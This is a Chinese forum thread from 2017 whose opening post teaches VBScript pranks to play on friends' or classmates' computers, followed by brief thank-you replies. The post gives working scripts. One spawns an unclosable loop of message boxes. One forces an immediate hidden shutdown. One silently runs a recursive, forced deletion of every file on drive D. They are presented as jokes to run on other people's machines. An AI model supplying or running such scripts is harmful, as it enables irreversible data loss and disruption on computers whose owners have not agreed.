浅诺め白羽 发表于 2017-9-1 12:30:13

简单易懂的vbs教程,恶搞朋友的电脑从我做起

1.新手教学(大神请跳到第五步):编写vbs有多简单?新建“文本文档”,输入msgbox "一大波病毒正在靠近..." ,点击文件->另存为->重命名为“代码.vbs”。文件名不重要,重要的是后缀要是“.vbs”。2.双击保存的文件:代码.vbs,即弹出一个对话框。记下这段小小的代码,去同学家里恶搞吧。当然你还可以输入其他有趣的文字。3.当然,如此恶搞还是不够的。那就来一个无限循环吧,输入图中代码另存为vbs格式。双击打开。此时,会弹出提示对话框,点击确定和关闭按钮之后,再一次弹出窗口,如此循环,无法正常关闭。4.那么到底要如何才能关闭呢?打开任务管理器结束进程“wscript.exe”即可5.给一个比较致命的代码,直接关机的→dim WSHshell set WSHshell = wscript.createobject("wscript.shell") WSHshell.run "shutdown -f -s -t 00",0 ,true6.删除D盘所有文件dim WSHshell set WSHshell = wscript.createobject("wscript.shell")
WSHshell.run "cmd /c ""del d:\*.* / f /q /s""",0 ,true

恶搞也该有个限度,适可而止

浅诺め白羽 发表于 2017-9-1 12:31:26

这个帖子,发了半天就是失败{:4_111:},终于发出来了

浅诺め白羽 发表于 2017-9-1 12:46:04

补个图.....

梦魇阁沐白 发表于 2017-9-1 12:50:21

我只是路过打酱油的

西瓜 发表于 2017-9-1 13:50:57

回的人少,我来小顶一下

辉煌の冷眸 发表于 2017-9-1 14:28:34

正需要,支持楼主大人了!

辉煌の冷眸 发表于 2017-9-1 14:29:16

打酱油路过{:4_114:}{:4_114:}{:4_114:}{:4_114:}{:4_114:}{:4_114:}{:4_114:}{:4_114:}

寻千度 发表于 2017-9-1 14:31:03

备注:不要在自己电脑试

brucc1 发表于 2017-9-1 15:04:39

啥也不说了,感谢楼主分享哇!{:4_96:}{:4_103:}

ぱ國ゐゑ爺ゆ 发表于 2017-9-1 18:20:42

珍惜生命,果断回帖。

Death-knight 发表于 2017-9-1 18:49:06

切!这算什么!在我没被打断腿之前我也干过!{:4_114:}{:4_114:}

1468377198 发表于 2017-9-1 19:30:17

55555559 发表于 2017-9-2 10:29:29

页: [1]
查看完整版本: 简单易懂的vbs教程,恶搞朋友的电脑从我做起